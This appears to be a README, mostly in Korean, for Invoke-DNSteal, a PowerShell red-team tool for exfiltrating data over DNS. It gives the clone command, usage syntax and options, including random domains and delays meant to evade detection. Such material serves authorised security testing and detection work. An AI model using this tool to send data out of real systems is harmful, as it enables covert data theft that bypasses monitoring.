
DNS 데이터 유출 도구로, UDP/TCP를 통해 페이로드를 전송하며, 검색 크기, 무작위 지연 및 무작위 도메인을 구성 가능하여 레드팀 작전 중 탐지를 회피합니다.

Invoke-DNSteal는 간단하고 사용자 정의 가능한 DNS 데이터 유출 도구입니다.
이 도구는 UDP 및 TCP를 통한 DNS 프로토콜을 통해 데이터를 유출하고, 랜덤 지연을 사용하여 쿼리 크기를 제어할 수 있도록 도와줍니다. 또한 각 쿼리에서 랜덤 도메인을 사용하여 탐지를 회피할 수 있으며, 로컬 및 원격 모두에서 정보를 전송하는 데 사용할 수 있습니다.
전체 저장소를 클론하거나 zip 파일을 다운로드하는 것을 권장합니다. 다음 명령어를 실행하여 수행할 수 있습니다:
git clone https://github.com/JoelGMSec/Invoke-DNSteal.git
.\Invoke-DNSteal.ps1 -h
___ _ ____ _ _ ____ _ _
|_ _| _ __ _ __ __ | | __ __ | _ \| | | / ___|| |__ __ __ _| |
| || | '_ \ \ / / _ \| |/ / _ \_____| | | | \| \___ \| __/ _ \/ _' | |
| || | | | \ V / (_) | < __/_____| |_| | |\ |___) | || __/ (_| | |
|___|_| |_|\_/ \___/|_|\_\___| |____/|_| \_|____/ \__\___|\__,_|_|
--------------------------- by @JoelGMSec --------------------------
Info: This tool helps you to exfiltrate data through DNS protocol
and lets you control the size of queries using random delay
Usage: .\Invoke-DNSteal.ps1 -t target -p payload -l length
-s server -tcponly true/false -min 3000 -max 5000
Parameters:
· Target: Domain target to exfiltrate data
· Payload: Payload to send over DNS chunks
· Length: Length of payload to control data size
· Server: Custom server to resolve DNS queries
· TcpOnly: Set TcpOnly to true or false
· Delay Min: Min delay time to do a query in ms
· Delay Max: Max delay time to do a query in ms
· Random: Use random domain name to avoid detection
Warning: The length (payload size) must be between 4 and 240
The process time will increase depending on data size
https://darkbyte.net/exfiltrando-informacion-por-dns-con-invoke-dnsteal
이 프로젝트는 GNU 3.0 라이선스에 따라 라이선스가 부여됩니다. 자세한 내용은 LICENSE 파일을 참조하십시오.
이 스크립트는 Joel Gámez Molina // @JoelGMSec에 의해 처음부터 생성 및 설계되었습니다.
DNS over TCP 구현 및 몇 가지 일반 Python 코드에 대해 @3v4si0n에게 특별히 감사드립니다.
이 소프트웨어는 어떠한 종류의 보증도 제공하지 않습니다. 사용은 교육 환경 및/또는 클라이언트의 동의를 받은 보안 감사에만 국한됩니다. 잘못된 사용이나 이로 인해 발생할 수 있는 어떠한 손해에 대해서도 책임을 지지 않습니다.
자세한 내용은 Twitter @JoelGMSec 및 블로그 darkbyte.net에서 확인할 수 있습니다.
제 작업을 지원하려면 커피 한 잔 사주세요: